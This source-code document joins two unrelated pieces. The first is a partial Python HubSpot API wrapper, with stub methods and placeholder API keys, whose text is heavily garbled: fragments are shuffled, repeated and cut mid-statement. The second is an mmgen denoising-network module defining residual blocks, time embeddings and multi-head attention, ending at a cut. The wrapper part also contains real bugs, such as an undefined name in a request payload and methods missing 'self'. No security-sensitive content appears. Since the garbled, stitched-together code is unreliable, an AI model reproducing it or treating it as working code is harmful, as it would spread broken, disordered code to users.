get_account_by_id(): pass # read all companies def get_all_accounts(): pass #", "url = self._lists_url + '/' + list_id + '/contacts/all' querystring = { 'vidOffset':", "list_id + '/contacts/all' querystring = { 'vidOffset': '0', 'count': '100', 'hapikey': '<KEY>', }", "def create_contact(): pass # update contact def update_contact(): pass # deleting contact def", "{ 'hapikey': '<KEY>', } response = requests.request( 'GET', url, params=querystring ) print(response.text) def", "payload = ujson.dumps({ 'name': list_name, 'dynamic': True, 'portalId': 5225356, 'filters': [], }) response", "= self._lists_url querystring = { 'offset': '0', 'count': '10', 'hapikey': '<KEY>', } response", "or owner id pass def create_deal(): pass def associate_contact_to_deal(): pass def associate_account_to_deal(): pass", "pass def get_access_token(self, refresh_token): pass def update_access_token(): pass ##### ACCOUNT APIS ##### def", "= requests.request( 'GET', url, params=querystring ) print(response.text) # create contact def create_contact(): pass", "def get_deal_owner_by_id(): # check deal id or owner id pass def create_deal(): pass", "'count': '10', 'hapikey': '<KEY>', } response = requests.request( 'GET', url, params=querystring ) print(response.text)", "def add_contacts_in_a_static_list(self, list_id, array_of_ids): url = self._lists_url + '/' + list_id + '/add'", "deal id or owner id pass def create_deal(): pass def associate_contact_to_deal(): pass def", "= { 'vid-offset': '0', 'count': '10', 'hapikey': '<KEY>', } response = requests.request( 'GET',", "requests import ujson # from b2b_app.config import CONFIG class Hubspot: def __init__(self, hub_id,", "'<KEY>', } response = requests.request( 'GET', url, params=querystring ) print(response.text) def get_list_by_id(self, list_id):", "get_access_token(self, refresh_token): pass def update_access_token(): pass ##### ACCOUNT APIS ##### def get_account_by_id(): pass", "'GET', url, params=querystring ) print(response.text) # create contact def create_contact(): pass # update", "hub_id self.refresh_token = refresh_token self.access_token = self.get_access_token(refresh_token) self._lists_url = 'https://api.hubapi.com/contacts/v1/lists' pass def get_access_token(self,", "url = self._lists_url + 'all/contacts/all' querystring = { 'vid-offset': '0', 'count': '10', 'hapikey':", "= hub_id self.refresh_token = refresh_token self.access_token = self.get_access_token(refresh_token) self._lists_url = 'https://api.hubapi.com/contacts/v1/lists' pass def", "update_contact(): pass # deleting contact def delete_contact(): pass def get_associated_deals_for_contact(): pass ##### LISTS", "pass def associate_contact_to_deal(): pass def associate_account_to_deal(): pass def dissociate_contact_from_deal(): pass def find_deal_owner(): #", "pass # deleting contact def delete_contact(): pass def get_associated_deals_for_contact(): pass ##### LISTS APIS", "##### ACCOUNT APIS ##### def get_account_by_id(): pass # read all companies def get_all_accounts():", "querystring = { 'hapikey': '<KEY>', } payload = ujson.dumps({ vids: array_of_ids }) response", "__init__(self, hub_id, refresh_token): self.hub_id = hub_id self.refresh_token = refresh_token self.access_token = self.get_access_token(refresh_token) self._lists_url", "all companies def get_all_contacts(): url = self._lists_url + 'all/contacts/all' querystring = { 'vid-offset':", "{ 'vid-offset': '0', 'count': '10', 'hapikey': '<KEY>', } response = requests.request( 'GET', url,", "= requests.request( 'POST', url, data=payload, 
params=querystring ) print(response.text) pass def delete_list(): pass def", "requests.request( 'GET', url, params=querystring ) print(response.text) def create_static_list(self, list_name): url = self._lists_url querystring", "'<KEY>', } payload = ujson.dumps({ 'name': list_name, 'dynamic': True, 'portalId': 5225356, 'filters': [],", "CONFIG class Hubspot: def __init__(self, hub_id, refresh_token): self.hub_id = hub_id self.refresh_token = refresh_token", "'/' + list_id querystring = { 'hapikey': '<KEY>', } response = requests.request( 'GET',", "url, params=querystring ) print(response.text) # create contact def create_contact(): pass # update contact", "get_all_contacts(): url = self._lists_url + 'all/contacts/all' querystring = { 'vid-offset': '0', 'count': '10',", "self._lists_url = 'https://api.hubapi.com/contacts/v1/lists' pass def get_access_token(self, refresh_token): pass def update_access_token(): pass ##### ACCOUNT", "def __init__(self, hub_id, refresh_token): self.hub_id = hub_id self.refresh_token = refresh_token self.access_token = self.get_access_token(refresh_token)", "companies def get_all_contacts(): url = self._lists_url + 'all/contacts/all' querystring = { 'vid-offset': '0',", "'100', 'hapikey': '<KEY>', } response = requests.request( 'GET', url, params=querystring ) print(response.text) def", "print(response.text) def add_contacts_in_a_static_list(self, list_id, array_of_ids): url = self._lists_url + '/' + list_id +", "url = self._lists_url querystring = { 'hapikey': '<KEY>', } payload = ujson.dumps({ 'name':", "def create_dynamic_list(): url = self._lists_url querystring = { 'hapikey': '<KEY>', } payload =", ") print(response.text) def get_all_dynamic_lists(): url = self._lists_url + '/dynamic' querystring = { 'offset':", "payload = ujson.dumps({ vids: array_of_ids }) response = requests.request( 'POST', url, data=payload, params=querystring", "id pass def create_deal(): pass def associate_contact_to_deal(): pass def associate_account_to_deal(): pass def dissociate_contact_from_deal():", "= { 'hapikey': '<KEY>', } response = requests.request( 'GET', url, params=querystring ) print(response.text)", "url, data=payload, params=querystring ) print(response.text) ##### DEAL APIS ##### # create deal def", "'hapikey': '<KEY>', } response = requests.request( 'GET', url, params=querystring ) print(response.text) # create", "in hubspot def create_account(): pass # update company def update_account(): # pass def", ") print(response.text) # create contact def create_contact(): pass # update contact def update_contact():", "= self.get_access_token(refresh_token) self._lists_url = 'https://api.hubapi.com/contacts/v1/lists' pass def get_access_token(self, refresh_token): pass def update_access_token(): pass", "= requests.request( 'POST', url, data=payload, params=querystring ) print(response.text) ##### DEAL APIS ##### #", "response = requests.request( 'POST', url, data=payload, params=querystring ) print(response.text) def create_dynamic_list(): url =", "True, 'portalId': 5225356, 'filters': [], }) response = requests.request( 'POST', url, data=payload, params=querystring", "refresh_token): pass def update_access_token(): pass ##### ACCOUNT APIS ##### def get_account_by_id(): pass #", "pass def create_deal(): pass def associate_contact_to_deal(): pass def associate_account_to_deal(): pass def dissociate_contact_from_deal(): pass", "'filters': [], }) response = requests.request( 'POST', url, data=payload, params=querystring ) print(response.text) pass", "# read all companies def 
get_all_contacts(): url = self._lists_url + 'all/contacts/all' querystring =", "ujson.dumps({ 'name': list_name, 'dynamic': True, 'portalId': 5225356, 'filters': [], }) response = requests.request(", "update company def update_account(): # pass def add_contact_to_account(): pass def get_associated_deals_for_account(): pass #####", "update_account(): # pass def add_contact_to_account(): pass def get_associated_deals_for_account(): pass ##### CONTACT APIS #####", "pass ##### ACCOUNT APIS ##### def get_account_by_id(): pass # read all companies def", "create deal def get_deal_owner_by_id(): # check deal id or owner id pass def", "get_deal_owner_by_id(): # check deal id or owner id pass def create_deal(): pass def", "'/' + list_id + '/contacts/all' querystring = { 'vidOffset': '0', 'count': '100', 'hapikey':", "pass def get_associated_deals_for_contact(): pass ##### LISTS APIS ##### def get_all_static_lists(): url = self._lists_url", "ujson.dumps({ vids: array_of_ids }) response = requests.request( 'POST', url, data=payload, params=querystring ) print(response.text)", "self._lists_url + 'all/contacts/all' querystring = { 'vid-offset': '0', 'count': '10', 'hapikey': '<KEY>', }", "'count': '100', 'hapikey': '<KEY>', } response = requests.request( 'GET', url, params=querystring ) print(response.text)", "url, params=querystring ) print(response.text) def create_static_list(self, list_name): url = self._lists_url querystring = {", "##### # create deal def get_deal_owner_by_id(): # check deal id or owner id", "company in hubspot def create_account(): pass # update company def update_account(): # pass", "create_deal(): pass def associate_contact_to_deal(): pass def associate_account_to_deal(): pass def dissociate_contact_from_deal(): pass def find_deal_owner():", "requests.request( 'GET', url, params=querystring ) print(response.text) def get_list_by_id(self, list_id): url = self._lists_url +", "= { 'offset': '0', 'count': '10', 'hapikey': '<KEY>', } response = requests.request( 'GET',", "# pass def add_contact_to_account(): pass def get_associated_deals_for_account(): pass ##### CONTACT APIS ##### def", "'hapikey': '<KEY>', } response = requests.request( 'GET', url, params=querystring ) print(response.text) def get_list_by_id(self,", "'GET', url, params=querystring ) print(response.text) def add_contacts_in_a_static_list(self, list_id, array_of_ids): url = self._lists_url +", "def get_all_contacts(): url = self._lists_url + 'all/contacts/all' querystring = { 'vid-offset': '0', 'count':", "def get_list_by_id(self, list_id): url = self._lists_url + '/' + list_id querystring = {", "print(response.text) def get_all_dynamic_lists(): url = self._lists_url + '/dynamic' querystring = { 'offset': '0',", "self._lists_url querystring = { 'hapikey': '<KEY>', } payload = ujson.dumps({ 'name': list_name, 'dynamic':", "Hubspot: def __init__(self, hub_id, refresh_token): self.hub_id = hub_id self.refresh_token = refresh_token self.access_token =", "'vidOffset': '0', 'count': '100', 'hapikey': '<KEY>', } response = requests.request( 'GET', url, params=querystring", "response = requests.request( 'POST', url, data=payload, params=querystring ) print(response.text) ##### DEAL APIS #####", "list_id): url = self._lists_url + '/' + list_id querystring = { 'hapikey': '<KEY>',", "params=querystring ) print(response.text) pass def delete_list(): pass def get_all_contacts_from_a_list(self, list_id): url = self._lists_url", "# create deal def get_deal_owner_by_id(): # check deal id or owner id pass", "def create_deal(): pass 
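    # The v1 contacts endpoint above returns at most `count` records per
    # call. A paged variant would follow the offset cursor instead; the
    # sketch below assumes the `has-more`, `vid-offset` and `contacts`
    # fields of the documented v1 response and is illustrative only, not a
    # tested part of this wrapper.
    def get_all_contacts_paged(self):
        url = self._lists_url + '/all/contacts/all'
        contacts, vid_offset, has_more = [], 0, True
        while has_more:
            querystring = {
                'vidOffset': vid_offset,
                'count': '100',
                'hapikey': '<KEY>',
            }
            body = requests.request('GET', url, params=querystring).json()
            contacts += body.get('contacts', [])
            has_more = body.get('has-more', False)
            vid_offset = body.get('vid-offset', 0)
        return contacts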
    ##### LISTS APIS #####

    def get_all_static_lists(self):
        url = self._lists_url
        querystring = {
            'offset': '0',
            'count': '10',
            'hapikey': '<KEY>',
        }
        response = requests.request('GET', url, params=querystring)
        print(response.text)

    def get_all_dynamic_lists(self):
        url = self._lists_url + '/dynamic'
        querystring = {
            'offset': '0',
            'count': '10',
            'hapikey': '<KEY>',
        }
        response = requests.request('GET', url, params=querystring)
        print(response.text)

    def get_list_by_id(self, list_id):
        url = self._lists_url + '/' + list_id
        querystring = {
            'hapikey': '<KEY>',
        }
        response = requests.request('GET', url, params=querystring)
        print(response.text)

    def create_static_list(self, list_name):
        url = self._lists_url
        querystring = {
            'hapikey': '<KEY>',
        }
        payload = ujson.dumps({
            'name': list_name,
            'dynamic': False,
            'portalId': 5225356,
            'filters': [],
        })
        response = requests.request(
            'POST', url, data=payload, params=querystring
        )
        print(response.text)

    def create_dynamic_list(self, list_name):
        url = self._lists_url
        querystring = {
            'hapikey': '<KEY>',
        }
        payload = ujson.dumps({
            'name': list_name,
            'dynamic': True,
            'portalId': 5225356,
            'filters': [],
        })
        response = requests.request(
            'POST', url, data=payload, params=querystring
        )
        print(response.text)

    def delete_list(self):
        pass

    def get_all_contacts_from_a_list(self, list_id):
        url = self._lists_url + '/' + list_id + '/contacts/all'
        querystring = {
            'vidOffset': '0',
            'count': '100',
            'hapikey': '<KEY>',
        }
        response = requests.request('GET', url, params=querystring)
        print(response.text)

    def add_contacts_in_a_static_list(self, list_id, array_of_ids):
        url = self._lists_url + '/' + list_id + '/add'
        querystring = {
            'hapikey': '<KEY>',
        }
        payload = ujson.dumps({
            'vids': array_of_ids,
        })
        response = requests.request(
            'POST', url, data=payload, params=querystring
        )
        print(response.text)

    ##### DEAL APIS #####

    # create deal
    def get_deal_owner_by_id(self):
        # check deal id or owner id
        pass

    def create_deal(self):
        pass

    def associate_contact_to_deal(self):
        pass

    def associate_account_to_deal(self):
        pass

    def dissociate_contact_from_deal(self):
        pass

    def find_deal_owner(self):
        # yes
        pass

    def test(self):
        pass
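# A minimal usage sketch for the wrapper above (the hub id, token, and list
# ids are placeholders; `get_access_token` is still a stub, so calls that
# need OAuth will not work until it is implemented):
#
#     hubspot = Hubspot(hub_id=5225356, refresh_token='<TOKEN>')
#     hubspot.create_static_list('prospects-2021')
#     hubspot.add_contacts_in_a_static_list('42', [101, 102])
#     hubspot.get_all_contacts_from_a_list('42')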
[ "Defaults to `dict(type='GN', num_groups=32)`. act_cfg (dict, optional): Config for the activation layer. Defaults", "]``, one per batch element. dim (int): The dimension of the embedding. max_period", "constant_init from mmgen.models.builder import MODULES, build_module class EmbedSequential(nn.Sequential): \"\"\"A sequential module that passes", "nn.Conv2d(in_channels, in_channels, 3, 1, 1) def forward(self, x): \"\"\"Forward function for upsampling operation.", "from copy import deepcopy from functools import partial import mmcv import numpy as", "as the swish function. Args: input (bool, optional): Use inplace operation or not.", "0 self.shortcut = nn.Conv2d( in_channels, out_channels, shortcut_kernel_size, padding=shortcut_padding) self.init_weights() def forward_shortcut(self, x): if", "v = torch.chunk(qkv, 3, dim=1) scale = 1 / np.sqrt(np.sqrt(channel)) weight = torch.einsum('bct,bcs->bts',", "to ``dict(type='GN', num_groups=32)`` \"\"\" def __init__(self, in_channels, num_heads=1, norm_cfg=dict(type='GN', num_groups=32)): super().__init__() self.num_heads =", "qkv = self.qkv(self.norm(x)) qkv = qkv.reshape(b * self.num_heads, -1, qkv.shape[2]) h = self.QKVAttention(qkv)", "the output channels will equal to the `in_channels`. Defaults to `None`. norm_cfg (dict,", "and re-scale normalization results. Otherwise, embedding results will directly add to input of", "embedding = torch.cat([torch.cos(args), torch.sin(args)], dim=-1) if dim % 2: embedding = torch.cat( [embedding,", "the input feature map. embedding_channels (int): Number of channels of the input embedding.", "after downsampling. \"\"\" return self.downsample(x) @MODULES.register_module() class DenoisingUpsample(nn.Module): \"\"\"Upsampling operation used in the", "torch.zeros_like(embedding[:, :1])], dim=-1) return embedding def forward(self, t): \"\"\"Forward function for time embedding", "upsample. Returns: torch.Tensor: Feature map after upsampling. \"\"\" x = F.interpolate(x, scale_factor=2, mode='nearest')", "an additional convolution layer after upsampling. Defaults to `True`. \"\"\" def __init__(self, in_channels,", "numpy as np import torch import torch.nn as nn import torch.nn.functional as F", "weight = torch.softmax(weight.float(), dim=-1).type(weight.dtype) weight = torch.einsum('bts,bcs->bct', weight, v) return weight def forward(self,", "reference to Two level embedding. First embedding time by an embedding function, then", "as ``[bz, ]``, one per batch element. dim (int): The dimension of the", "torch.sigmoid(x) return F.silu(x, inplace=self.inplace) @MODULES.register_module() class MultiHeadAttention(nn.Module): \"\"\"An attention block allows spatial position", "\"\"\" if torch.__version__ < '1.6.0': return x * torch.sigmoid(x) return F.silu(x, inplace=self.inplace) @MODULES.register_module()", "half = dim // 2 freqs = torch.exp( -np.log(max_period) * torch.arange(start=0, end=half, dtype=torch.float32)", "freqs[None] embedding = torch.cat([torch.cos(args), torch.sin(args)], dim=-1) if dim % 2: embedding = torch.cat(", "self.learnable_shortcut: return self.shortcut(x) return x def forward(self, x, y): \"\"\"Forward function. Args: x", "Args: x (torch.Tensor): Input feature map tensor. y (torch.Tensor): Shared time embedding or", "after upsampling. \"\"\" x = F.interpolate(x, scale_factor=2, mode='nearest') if self.with_conv: x = self.conv(x)", "input feature map. num_heads (int, optional): Number of heads in the attention. 
norm_cfg", "F.silu(x, inplace=self.inplace) @MODULES.register_module() class MultiHeadAttention(nn.Module): \"\"\"An attention block allows spatial position to attend", "self.conv_2(x) return x + shortcut def init_weights(self): # apply zero init to last", "# Copyright (c) OpenMMLab. All rights reserved. from copy import deepcopy from functools", "deepcopy(norm_cfg) _, norm_1 = build_norm_layer(_norm_cfg, in_channels) conv_1 = [ norm_1, build_activation_layer(act_cfg), nn.Conv2d(in_channels, out_channels,", "def forward(self, x, y): for layer in self: if isinstance(layer, DenoisingResBlock): x =", "norm_cfg=dict(type='GN', num_groups=32), act_cfg=dict(type='SiLU', inplace=False), use_scale_shift=True): super().__init__() self.use_scale_shift = use_scale_shift _, self.norm = build_norm_layer(norm_cfg,", "convolution operation for downsampling. Defaults to `True`. \"\"\" def __init__(self, in_channels, with_conv=True): super().__init__()", "-1, h.shape[-1]) h = self.proj(h) return (h + x).reshape(b, c, *spatial) def init_weights(self):", "nn.Conv2d( in_channels, out_channels, shortcut_kernel_size, padding=shortcut_padding) self.init_weights() def forward_shortcut(self, x): if self.learnable_shortcut: return self.shortcut(x)", "for activation layer. Defaults to ``dict(type='SiLU', inplace=False)``. \"\"\" def __init__(self, in_channels, embedding_channels, embedding_mode='sin',", "shape as ``[bz, ]``, one per batch element. dim (int): The dimension of", "config for the normalization layers. Defaults too ``dict(type='GN', num_groups=32)``. act_cfg (dict, optional): The", "mmcv.cnn import ACTIVATION_LAYERS from mmcv.cnn.bricks import build_activation_layer, build_norm_layer from mmcv.cnn.utils import constant_init from", "num_heads (int, optional): Number of heads in the attention. norm_cfg (dict, optional): Config", "shortcut_kernel_size in [ 1, 3 ], ('Only support `1` and `3` for `shortcut_kernel_size`,", "x = x.reshape(b, c, -1) qkv = self.qkv(self.norm(x)) qkv = qkv.reshape(b * self.num_heads,", "feature map. embedding_channels (int): The channel number of the output embedding. embedding_mode (str,", "\"\"\" b, c, *spatial = x.shape x = x.reshape(b, c, -1) qkv =", "support `1` and `3` for `shortcut_kernel_size`, but ' f'receive {shortcut_kernel_size}.') self.learnable_shortcut = out_channels", "DenoisingUpsample(nn.Module): \"\"\"Upsampling operation used in the denoising network. Allows users to apply an", "in_channels self.embedding_layer = nn.Sequential( build_activation_layer(act_cfg), nn.Linear(embedding_channels, embedding_output)) def forward(self, x, y): \"\"\"Forward function.", "block allows spatial position to attend to each other. Originally ported from here,", "self.num_heads = num_heads _, self.norm = build_norm_layer(norm_cfg, in_channels) self.qkv = nn.Conv1d(in_channels, in_channels *", "to the `in_channels`. Defaults to `None`. norm_cfg (dict, optional): The config for the", "as `[bz, dim]`. \"\"\" half = dim // 2 freqs = torch.exp( -np.log(max_period)", ":1])], dim=-1) return embedding def forward(self, t): \"\"\"Forward function for time embedding layer.", "feature map to be downsampled. with_conv (bool, optional): Whether use convolution operation for", "embedding_channels)) # add `dim` to embedding config embedding_cfg_ = dict(dim=in_channels) if embedding_cfg is", "used in the denoising network. Allows users to apply an additional convolution layer", "attention. norm_cfg (dict, optional): Config for normalization layer. 
Default to ``dict(type='GN', num_groups=32)`` \"\"\"", "(1 + scale) + shift else: x = self.norm(x + embedding) return x", "to upsample. Returns: torch.Tensor: Feature map after upsampling. \"\"\" x = F.interpolate(x, scale_factor=2,", "case. https://github.com/hojonathanho/diffusion/blob/1e0dceb3b3495bbe19116a5e1b3596cd0706c543/diffusion_tf/models/unet.py#L66. # noqa Args: in_channels (int): Channels of the input feature map.", "Copyright (c) OpenMMLab. All rights reserved. from copy import deepcopy from functools import", "def forward_shortcut(self, x): if self.learnable_shortcut: return self.shortcut(x) return x def forward(self, x, y):", "else 0 self.shortcut = nn.Conv2d( in_channels, out_channels, shortcut_kernel_size, padding=shortcut_padding) self.init_weights() def forward_shortcut(self, x):", "embedding_mode='sin', embedding_cfg=None, act_cfg=dict(type='SiLU', inplace=False)): super().__init__() self.blocks = nn.Sequential( nn.Linear(in_channels, embedding_channels), build_activation_layer(act_cfg), nn.Linear(embedding_channels, embedding_channels))", "Defaults to ``dict(type='SiLU', inplace=False)``. shortcut_kernel_size (int, optional): The kernel size for the shortcut", "\"\"\" embedding = self.embedding_layer(y)[:, :, None, None] if self.use_scale_shift: scale, shift = torch.chunk(embedding,", "to each other. Originally ported from here, but adapted to the N-d case.", "as np import torch import torch.nn as nn import torch.nn.functional as F from", "and inplace: mmcv.print_log('Inplace version of \\'SiLU\\' is not supported for ' f'torch <", "Embedding layer will be added with the input before normalization operation. Defaults to", "channels of the input feature map. embedding_channels (int) Number of channels of the", "shared label embedding. Returns: torch.Tensor : Output feature map tensor. \"\"\" shortcut =", "forward(self, x): \"\"\"Forward function for upsampling operation. Args: x (torch.Tensor): Feature map to", "map the output of normalization layer to ``out * (1 + scale) +", "= nn.Sequential( nn.Linear(in_channels, embedding_channels), build_activation_layer(act_cfg), nn.Linear(embedding_channels, embedding_channels)) # add `dim` to embedding config", "channel number of the input feature map. embedding_channels (int): The channel number of", "deepcopy from functools import partial import mmcv import numpy as np import torch", "import MODULES, build_module class EmbedSequential(nn.Sequential): \"\"\"A sequential module that passes timestep embeddings to", "label embedding. Returns: torch.Tensor : Output feature map tensor. \"\"\" shortcut = self.forward_shortcut(x)", "in_channels, embedding_channels, norm_cfg=dict(type='GN', num_groups=32), act_cfg=dict(type='SiLU', inplace=False), use_scale_shift=True): super().__init__() self.use_scale_shift = use_scale_shift _, self.norm", "Feature map after attention. \"\"\" b, c, *spatial = x.shape x = x.reshape(b,", "conv layers will be added. Args: in_channels (int): Number of channels of the", "time embedding. Defaults to 'sin'. embedding_cfg (dict, optional): Config for time embedding. Defaults", "function, element-wise. The SiLU function is also known as the swish function. Args:", "norm_cfg (dict, optional): Config for the normalization operation. Defaults to `dict(type='GN', num_groups=32)`. act_cfg", "convolution for downsample operation. Args: in_channels (int): Number of channels of the input", "adapted to the N-d case. 
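# Shape check for the sinusoidal embedding above: a batch of timesteps of
# shape ``[bz, ]`` maps to ``[bz, dim]``, with the first half cosine terms
# and the second half sine terms. A quick illustrative snippet (the names
# are local to this example):
#
#     t = torch.tensor([0, 10, 100])
#     emb = TimeEmbedding.sinusodial_embedding(t, dim=8)
#     assert emb.shape == (3, 8)
#     assert torch.allclose(emb[0, :4], torch.ones(4))   # cos(0) == 1
#     assert torch.allclose(emb[0, 4:], torch.zeros(4))  # sin(0) == 0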
@ACTIVATION_LAYERS.register_module()
class SiLU(nn.Module):
    r"""Applies the Sigmoid Linear Unit (SiLU) function, element-wise.
    The SiLU function is also known as the swish function.

    Args:
        inplace (bool, optional): Whether to use the inplace operation.
            Defaults to `False`.
    """

    def __init__(self, inplace=False):
        super().__init__()
        if torch.__version__ < '1.6.0' and inplace:
            mmcv.print_log('Inplace version of \'SiLU\' is not supported for '
                           f'torch < 1.6.0, found \'{torch.__version__}\'.')
        self.inplace = inplace

    def forward(self, x):
        """Forward function for SiLU.

        Args:
            x (torch.Tensor): Input tensor.

        Returns:
            torch.Tensor: Tensor after activation.
        """
        if torch.__version__ < '1.6.0':
            return x * torch.sigmoid(x)
        return F.silu(x, inplace=self.inplace)
@MODULES.register_module()
class MultiHeadAttention(nn.Module):
    """An attention block that allows spatial positions to attend to each
    other. Originally ported from here, but adapted to the N-d case.
    https://github.com/hojonathanho/diffusion/blob/1e0dceb3b3495bbe19116a5e1b3596cd0706c543/diffusion_tf/models/unet.py#L66.  # noqa

    Args:
        in_channels (int): Channels of the input feature map.
        num_heads (int, optional): Number of heads in the attention.
        norm_cfg (dict, optional): Config for the normalization layer.
            Defaults to ``dict(type='GN', num_groups=32)``.
    """

    def __init__(self,
                 in_channels,
                 num_heads=1,
                 norm_cfg=dict(type='GN', num_groups=32)):
        super().__init__()
        self.num_heads = num_heads
        _, self.norm = build_norm_layer(norm_cfg, in_channels)
        self.qkv = nn.Conv1d(in_channels, in_channels * 3, 1)
        self.proj = nn.Conv1d(in_channels, in_channels, 1)
        self.init_weights()

    @staticmethod
    def QKVAttention(qkv):
        channel = qkv.shape[1] // 3
        q, k, v = torch.chunk(qkv, 3, dim=1)
        scale = 1 / np.sqrt(np.sqrt(channel))
        weight = torch.einsum('bct,bcs->bts', q * scale, k * scale)
        weight = torch.softmax(weight.float(), dim=-1).type(weight.dtype)
        return torch.einsum('bts,bcs->bct', weight, v)

    def forward(self, x):
        """Forward function for multi head attention.

        Args:
            x (torch.Tensor): Input feature map.

        Returns:
            torch.Tensor: Feature map after attention.
        """
        b, c, *spatial = x.shape
        x = x.reshape(b, c, -1)
        qkv = self.qkv(self.norm(x))
        qkv = qkv.reshape(b * self.num_heads, -1, qkv.shape[2])
        h = self.QKVAttention(qkv)
        h = h.reshape(b, -1, h.shape[-1])
        h = self.proj(h)
        return (h + x).reshape(b, c, *spatial)

    def init_weights(self):
        constant_init(self.proj, 0)
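# Minimal shape sketch for ``MultiHeadAttention``; the sizes (batch 2,
# 64 channels, 2 heads, an 8x8 map) are illustrative assumptions. The real
# constraints are that ``in_channels`` is divisible by the GroupNorm group
# count (32 by default) and by ``num_heads``.
def _demo_multi_head_attention():
    attn = MultiHeadAttention(in_channels=64, num_heads=2)
    x = torch.randn(2, 64, 8, 8)
    # residual design: the output shape matches the input shape
    assert attn(x).shape == x.shape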
@MODULES.register_module()
class TimeEmbedding(nn.Module):
    """Time embedding layer with a two-level embedding: timesteps are first
    mapped by a fixed embedding function and then fed to a small neural
    network.

    Args:
        in_channels (int): The channel number of the input feature map.
        embedding_channels (int): The channel number of the output embedding.
        embedding_mode (str, optional): Embedding mode for the time embedding.
            Defaults to 'sin'.
        embedding_cfg (dict, optional): Config for the time embedding.
            Defaults to None.
        act_cfg (dict, optional): Config for the activation layer. Defaults
            to ``dict(type='SiLU', inplace=False)``.
    """

    def __init__(self,
                 in_channels,
                 embedding_channels,
                 embedding_mode='sin',
                 embedding_cfg=None,
                 act_cfg=dict(type='SiLU', inplace=False)):
        super().__init__()
        self.blocks = nn.Sequential(
            nn.Linear(in_channels, embedding_channels),
            build_activation_layer(act_cfg),
            nn.Linear(embedding_channels, embedding_channels))

        # add `dim` to embedding config
        embedding_cfg_ = dict(dim=in_channels)
        if embedding_cfg is not None:
            embedding_cfg_.update(embedding_cfg)
        if embedding_mode.upper() == 'SIN':
            self.embedding_fn = partial(self.sinusodial_embedding,
                                        **embedding_cfg_)
        else:
            raise ValueError('Only support `SIN` for time embedding, '
                             f'but receive {embedding_mode}.')

    @staticmethod
    def sinusodial_embedding(timesteps, dim, max_period=10000):
        """Create sinusoidal timestep embeddings.

        Args:
            timesteps (torch.Tensor): Timesteps to embed, a 1-D tensor of
                shape ``[bz, ]``, one per batch element.
            dim (int): The dimension of the embedding.
            max_period (int, optional): Controls the minimum frequency of the
                embeddings. Defaults to ``10000``.

        Returns:
            torch.Tensor: Embedding results of shape ``[bz, dim]``.
        """
        half = dim // 2
        freqs = torch.exp(
            -np.log(max_period) *
            torch.arange(start=0, end=half, dtype=torch.float32) /
            half).to(device=timesteps.device)
        args = timesteps[:, None].float() * freqs[None]
        embedding = torch.cat([torch.cos(args), torch.sin(args)], dim=-1)
        if dim % 2:
            embedding = torch.cat(
                [embedding, torch.zeros_like(embedding[:, :1])], dim=-1)
        return embedding

    def forward(self, t):
        """Forward function for the time embedding layer.

        Args:
            t (torch.Tensor): Input timesteps.

        Returns:
            torch.Tensor: Timesteps embedding.
        """
        return self.blocks(self.embedding_fn(t))
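# Minimal usage sketch for ``TimeEmbedding``; the 128 -> 512 sizes mirror
# the common DDPM convention of a 4x wider embedding MLP but are only
# illustrative assumptions here.
def _demo_time_embedding():
    embed = TimeEmbedding(in_channels=128, embedding_channels=512)
    t = torch.randint(0, 1000, (4, ))
    assert embed(t).shape == (4, 512)

    # the raw sinusoidal embedding alone maps ``[bz, ]`` to ``[bz, dim]``
    raw = TimeEmbedding.sinusodial_embedding(t, dim=128)
    assert raw.shape == (4, 128)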
@MODULES.register_module()
class DenoisingResBlock(nn.Module):
    """Resblock for the denoising network. If `in_channels` does not equal
    `out_channels`, a learnable shortcut with conv layers will be added.

    Args:
        in_channels (int): Number of channels of the input feature map.
        embedding_channels (int): Number of channels of the input embedding.
        use_scale_shift_norm (bool): Whether to use scale-shift-norm in the
            `NormWithEmbedding` layer.
        dropout (float): Probability of the dropout layers.
        out_channels (int, optional): Number of output channels of the
            ResBlock. If not defined, the output channels will equal
            `in_channels`. Defaults to `None`.
        norm_cfg (dict, optional): The config for the normalization layers.
            Defaults to ``dict(type='GN', num_groups=32)``.
        act_cfg (dict, optional): The config for the activation layers.
            Defaults to ``dict(type='SiLU', inplace=False)``.
        shortcut_kernel_size (int, optional): The kernel size for the shortcut
            conv. Defaults to ``1``.
    """

    def __init__(self,
                 in_channels,
                 embedding_channels,
                 use_scale_shift_norm,
                 dropout,
                 out_channels=None,
                 norm_cfg=dict(type='GN', num_groups=32),
                 act_cfg=dict(type='SiLU', inplace=False),
                 shortcut_kernel_size=1):
        super().__init__()
        out_channels = in_channels if out_channels is None else out_channels

        _norm_cfg = deepcopy(norm_cfg)

        _, norm_1 = build_norm_layer(_norm_cfg, in_channels)
        conv_1 = [
            norm_1,
            build_activation_layer(act_cfg),
            nn.Conv2d(in_channels, out_channels, 3, padding=1)
        ]
        self.conv_1 = nn.Sequential(*conv_1)

        norm_with_embedding_cfg = dict(
            in_channels=out_channels,
            embedding_channels=embedding_channels,
            use_scale_shift=use_scale_shift_norm,
            norm_cfg=_norm_cfg)
        self.norm_with_embedding = build_module(
            dict(type='NormWithEmbedding'),
            default_args=norm_with_embedding_cfg)

        conv_2 = [
            build_activation_layer(act_cfg),
            nn.Dropout(dropout),
            nn.Conv2d(out_channels, out_channels, 3, padding=1)
        ]
        self.conv_2 = nn.Sequential(*conv_2)

        assert shortcut_kernel_size in [
            1, 3
        ], ('Only support `1` and `3` for `shortcut_kernel_size`, but '
            f'receive {shortcut_kernel_size}.')

        self.learnable_shortcut = out_channels != in_channels

        if self.learnable_shortcut:
            shortcut_padding = 1 if shortcut_kernel_size == 3 else 0
            self.shortcut = nn.Conv2d(
                in_channels,
                out_channels,
                shortcut_kernel_size,
                padding=shortcut_padding)
        self.init_weights()

    def forward_shortcut(self, x):
        if self.learnable_shortcut:
            return self.shortcut(x)
        return x

    def forward(self, x, y):
        """Forward function.

        Args:
            x (torch.Tensor): Input feature map tensor.
            y (torch.Tensor): Shared time embedding or shared label embedding.

        Returns:
            torch.Tensor: Output feature map tensor.
        """
        shortcut = self.forward_shortcut(x)
        x = self.conv_1(x)
        x = self.norm_with_embedding(x, y)
        x = self.conv_2(x)
        return x + shortcut

    def init_weights(self):
        # apply zero init to the last conv layer
        constant_init(self.conv_2[-1], 0)
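# Minimal usage sketch for ``DenoisingResBlock``; all sizes are illustrative
# assumptions. Because ``out_channels`` (128) differs from ``in_channels``
# (64), the block builds a learnable 1x1 shortcut.
def _demo_denoising_resblock():
    block = DenoisingResBlock(
        in_channels=64,
        embedding_channels=512,
        use_scale_shift_norm=True,
        dropout=0.1,
        out_channels=128)
    x = torch.randn(2, 64, 32, 32)
    y = torch.randn(2, 512)
    # spatial size is preserved; only the channel count changes
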